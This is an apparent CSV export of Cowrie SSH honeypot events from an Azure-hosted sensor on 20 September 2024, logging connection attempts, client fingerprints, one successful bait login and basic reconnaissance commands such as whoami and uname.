+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:51.841 PM",,"{""eventid"":""cowrie.login.success"",""username"":""nathan"",""password"":""Password1!"",""message"":""login attempt [nathan/Password1!] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.840370Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:51.875 PM",,"{""eventid"":""cowrie.client.size"",""width"":236,""height"":13,""message"":""Terminal Size: 236 13"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.874542Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:51.878 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:51.876828Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:54.303 PM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:54.302140Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:56.716 PM",,"{""eventid"":""cowrie.command.input"",""input"":""whoami"",""message"":""CMD: whoami"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:56.714933Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:02.711 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -a"",""message"":""CMD: uname -a"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:02.710709Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:29.339 PM",,"{""eventid"":""cowrie.command.input"",""input"":""scp"",""message"":""CMD: scp"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:29.338128Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:38.534 PM",,"{""eventid"":""cowrie.command.input"",""input"":""scp -help"",""message"":""CMD: scp -help"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:38.533475Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:47.287 PM",,"{""eventid"":""cowrie.command.input"",""input"":""nmap"",""message"":""CMD: nmap"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:47.286546Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:24:47.289 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""nmap"",""message"":""Command not found: nmap"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:24:47.288478Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:13.120 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""157.230.106.97"",""src_port"":28613,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e02f9dfa15a7"",""protocol"":""ssh"",""message"":""New connection: 157.230.106.97:28613 (10.0.0.4:2222) [session: e02f9dfa15a7]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:13.119489Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:13.129 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.007738351821899414,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:13.128576Z"",""src_ip"":""157.230.106.97"",""session"":""e02f9dfa15a7""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:16.490 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""157.230.106.97"",""src_port"":2679,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""19053fcc6859"",""protocol"":""ssh"",""message"":""New connection: 157.230.106.97:2679 (10.0.0.4:2222) [session: 19053fcc6859]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:16.489410Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:16.578 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.08674335479736328,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:16.577544Z"",""src_ip"":""157.230.106.97"",""session"":""19053fcc6859""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.198 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.71.62.129"",""src_port"":45752,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""23ad8a7a2213"",""protocol"":""ssh"",""message"":""New connection: 167.71.62.129:45752 (10.0.0.4:2222) [session: 23ad8a7a2213]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.196980Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.199 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.198487Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:19.287 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""2aec6b44b06bec95d73f66b5d30cb69a"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:19.285187Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:18:39.199 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":19.99979567527771,""message"":""Connection lost after 19 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:18:39.198186Z"",""src_ip"":""167.71.62.129"",""session"":""23ad8a7a2213""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:05.794 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""199.45.155.95"",""src_port"":35340,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a0c645f0ded0"",""protocol"":""ssh"",""message"":""New connection: 199.45.155.95:35340 (10.0.0.4:2222) [session: a0c645f0ded0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:05.793313Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:06.616 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:06.615812Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:06.620 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""873a5fb5fedc2d4f8638ebde4abc6cfc"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:06.617207Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:34:21.748 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":15.952751874923706,""message"":""Connection lost after 15 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:34:21.747492Z"",""src_ip"":""199.45.155.95"",""session"":""a0c645f0ded0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:45:31.258 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""205.210.31.74"",""src_port"":52588,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1cef22654fde"",""protocol"":""ssh"",""message"":""New connection: 205.210.31.74:52588 (10.0.0.4:2222) [session: 1cef22654fde]"",""sensor"":""server01"",""timestamp"":""2024-09-20T18:45:31.257598Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:45:31.419 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.15976452827453613,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T18:45:31.418754Z"",""src_ip"":""205.210.31.74"",""session"":""1cef22654fde""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:01.716 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""199.45.154.147"",""src_port"":43414,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0f96692fad07"",""protocol"":""ssh"",""message"":""New connection: 199.45.154.147:43414 (10.0.0.4:2222) [session: 0f96692fad07]"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:01.715304Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:01.939 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:01.939023Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:02.286 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""873a5fb5fedc2d4f8638ebde4abc6cfc"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:02.283228Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:08:17.640 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":15.57369875907898,""message"":""Connection lost after 15 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:08:17.290297Z"",""src_ip"":""199.45.154.147"",""session"":""0f96692fad07""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:04:01.305 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":46887,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""92be41800a3a"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:46887 (10.0.0.4:2222) [session: 92be41800a3a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:04:01.304535Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:04:01.382 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07588720321655273,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:04:01.381764Z"",""src_ip"":""38.88.252.187"",""session"":""92be41800a3a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.467 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":41586,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""69cf13a1fcde"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:41586 (10.0.0.4:2222) [session: 69cf13a1fcde]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.465979Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.700 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.23193883895874023,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.699192Z"",""src_ip"":""36.138.164.147"",""session"":""69cf13a1fcde""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:26.975 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":41780,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""b771cfe769f5"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:41780 (10.0.0.4:2222) [session: b771cfe769f5]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:26.974053Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:30.751 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":42246,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""30c7b7ed5b26"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:42246 (10.0.0.4:2222) [session: 30c7b7ed5b26]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:30.749639Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:30.980 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.2280747890472412,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:30.979461Z"",""src_ip"":""36.138.164.147"",""session"":""30c7b7ed5b26""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:31.218 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""36.138.164.147"",""src_port"":42526,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9a68e84f7827"",""protocol"":""ssh"",""message"":""New connection: 36.138.164.147:42526 (10.0.0.4:2222) [session: 9a68e84f7827]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:12:31.217090Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:55.860 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.158"",""src_port"":57962,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""79e745d1bcb3"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.158:57962 (10.0.0.4:2222) [session: 79e745d1bcb3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:55.859356Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:56.750 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:56.749760Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:26:57.500 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.co